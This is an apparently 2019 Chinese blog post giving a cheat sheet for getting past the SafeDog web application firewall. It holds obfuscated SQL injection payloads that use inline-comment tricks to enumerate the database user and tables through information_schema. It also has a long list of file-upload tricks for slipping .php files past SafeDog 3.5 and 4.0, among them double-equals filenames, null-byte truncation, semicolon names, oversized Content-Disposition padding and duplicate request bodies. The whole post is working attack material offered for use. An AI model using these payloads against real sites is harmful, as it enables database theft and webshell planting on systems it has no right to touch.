简单的过安全狗

1、SQL注入

1And -1=-1

2group by

3union/*%!a*/select 1,2,3,4,5,6,7,8 或者 union/*!66666asdfsadfsdaf*/select 1,2,3,4,5,6,7,8

4union/*!66666asdfsadfsdaf*/select 1,2,3,USER%0a/*!66666ASFSADF*/(),5,6,7,8 或者 union/*%!a*/select 1,2,3,database/*%!a*/(),5,6,7,8

5union/*%!a*/select/*!34233user%0a/*%!a*/()*/,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema='baji'

或者union/*!66666asdfsadfsdaf*/select user/*!66666asdfsadfsdaf*/(),2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema='baji'


2、文件上传绕过安全狗

1,header'aa.php 单引号
2,filename=="php" 双等号
3,截断
4,特殊文件名filename="header.txt;.php"
// 以下有几率成功
5,叹号文件名(!ash.php)
6, 修改content-type类型(video/mpeg)
7,Content-Disposition: form-dataxxxx;xxx位置超过466个字符。
8,Content-Disposition: form-data; name="uppic"xxxx; ;xxx位置超过466个字符。
9,filename=&"php" 等号后面加特殊字符空格和换行

------------------------------------------以下方式可当成html执行---
10,文件名为111.&php   
11,filename=2342sdf.^php
12.filename=x.jpg() 可弹窗
12.filename=x.~jpg 可弹窗
上传成功:uploads/x.'php' 可弹窗
------------------------------------
1,单引号 xxx'xx.php
2,xxx.php.txt 抓包00截断
3,xxx.jpg;.php 特殊文件名绕过。
4,全角空格(截断的原理)
5,在数据包form-data:后面添加466个字符
6,双数据包, 复制请求主体,粘贴到下方,修改第一个主体的后缀名图片
(3.5不可绕过,4.0可绕过)
7,删除content-type或者Content-Disposition后面的空格
(3.5可绕过,4.0不可以)
8,修改Content-Disposition: form-data; name="pic"; filename=="2.jpg.php" (两个==绕4.0,三个=通吃)
9,修改name=pic(name为大写,3.5版本可以)
10,form-data(修改任意字符就可以绕过(3.5版本))
11,filename="2.jpg.php" (去掉双引号4.0绕过)
12,并发访问让防护失效,可有机会上传.
13,filename="2.jpg.php"(去掉双引号+反引号`,4.0版本)
--------------------------------------------------------------
safedog4.0
1,文件名字加单引号' 如:hack'.php
2, 在请求头中的Content-Disposion:修改filename为双等号==; filename=="lanou.txt.php"
3, 00截断绕过
4,文件名字加分号;如:hack;.php
5,Content-Disposion:长度超过指定大小,即可上传任何文件。
6,文件名.php前加个换行
-----------------------------------------------------------------

 

posted @ 2019-07-17 17:13  guike  阅读(198)  评论(0)    收藏  举报